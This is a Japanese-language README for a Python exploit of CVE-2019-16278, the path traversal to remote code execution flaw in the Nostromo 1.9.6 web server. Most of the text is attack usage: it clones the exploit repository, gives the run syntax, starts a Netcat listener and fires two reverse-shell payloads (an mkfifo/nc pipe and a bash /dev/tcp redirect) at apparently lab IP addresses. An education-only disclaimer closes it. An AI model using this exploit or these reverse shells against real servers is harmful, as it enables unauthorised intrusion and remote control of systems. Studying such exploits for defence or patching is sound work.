
認証されていない攻撃者は、URL の検証に失敗するため、サーバーを '/bin/sh' のようなシェルファイルに強制的にポイントさせ、システムに存在する任意のファイルへのパストラバーサルを引き起こして、任意のコマンドを実行できます。1.9.6 などの Nostromo のバージョンはこの URL の検証に失敗します。
POC
リポジトリ: https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
このリポジトリには、Nostromo 1.9.6(Webサーバー)の脆弱性であるCVE-2019-16278を悪用するPythonエクスプロイトが含まれています。この脆弱性により、ディレクトリトラバーサルを利用して標的システム上で任意のコマンドを実行する**リモートコード実行(RCE)**が可能になります。
git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution
python3 CVE-2019-16278.py -t <TARGET_IP> -p <PORT> -c "<COMMAND>" [-b <BYTES_TO_READ>]
引数:
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"
ステップ 1: 攻撃用マシンでNetcatリスナーを起動する:
nc -lvnp 443
ステップ 2: リバースシェルペイロードを指定してエクスプロイトを実行する:
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"
CVE: CVE-2019-16278
影響を受けるソフトウェア: Nostromo 1.9.6 Webサーバー
種類: ディレクトリトラバーサル -> リモートコード実行
このツールは教育目的のみを意図しています。所有していない、またはテストする明示的な許可を得ていないシステムでは使用しないでください。システムへの不正アクセスは違法です。責任を持って使用してください。
| 引数 | 説明 | 必須 | デフォルト |
|---|
| -t, --target | 標的のIPアドレス | はい | なし |
| -p, --port | 標的のポート | はい | なし |
| -c, --command | サーバー上で実行するコマンド | はい | なし |
| -b, --bytes | レスポンスで読み取るバイト数 | いいえ | 4096 |